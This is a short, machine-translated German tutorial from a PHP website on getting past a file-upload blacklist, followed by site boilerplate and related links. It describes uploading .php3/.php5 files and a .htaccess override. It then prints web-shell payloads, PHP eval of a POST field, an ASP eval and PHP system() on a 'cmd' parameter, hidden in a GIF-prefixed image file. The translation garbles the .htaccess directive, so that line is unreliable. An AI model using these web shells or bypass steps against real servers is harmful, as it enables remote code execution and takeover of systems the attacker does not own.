Dieser Artikel stellt hauptsächlich die Methode zum Umgehen der Blacklist durch das Hochladen von Dateien vor. Jetzt kann ich ihn mit Ihnen teilen.
Auf dieser Ebene geht es hauptsächlich um das Festlegen des Uploads Suffix. Das Einschränken von Suffixen wie ASP, PHP, JSP usw. und das Hochladen ist nicht zulässig.
Position 1: Diese Umgehungsmethode besteht darin, das Suffix in .php3, php5 usw. zu ändern. Hier ist die Blacklist-Überprüfung ('.asp', '.aspx', '.php', '.jsp') ) können wir PHP3, PHP5... und andere Suffixnamen hochladen, die vom Server analysiert werden können
Position 2: Schreiben Sie die Dateianalyseregeln neu, um sie zu umgehen
1. Laden Sie zuerst eine Datei mit dem Namen .htaccess mit folgendem Inhalt hoch:
SetHandler-Anwendung /x-httpd-php
2. 1.jpg-Skript hochladen
Inhalt:
GIF89a
<?php eval($_POST['joker']);?>
<%eval request("joker")%>
<?php system($_POST['cmd']);?>
<span style="max-width:90%"><br/>最后查看结果如下:<br/><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""/><br/></span>
Das Obige ist der gesamte Inhalt dieses Artikels. Ich hoffe, dass er für alle hilfreich ist Bitte kontaktieren Sie uns für weitere verwandte Inhalte. Folgen Sie der chinesischen PHP-Website!
Verwandte Empfehlungen:
PHP verwendet Azure Storage Blob zum Hochladen von Dateien
Einführung in das Nginx-Memcache-Caching
Das obige ist der detaillierte Inhalt vonSo umgehen Sie die Blacklist beim Hochladen von Dateien. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!
Was sind die am häufigsten verwendeten Befehle in Postgresql?
Verwendung des übergeordneten Knotens
Oracle-Datenbankwiederherstellungsmethode
So schreiben Sie MySQL-Prüfeinschränkungen
Verwendung von Oracle-Einsätzen
Der Unterschied zwischen null und NULL in der C-Sprache
Inländische kostenlose ChatGPT-Enzyklopädie
Was sind die Hauptmerkmale von Computern?
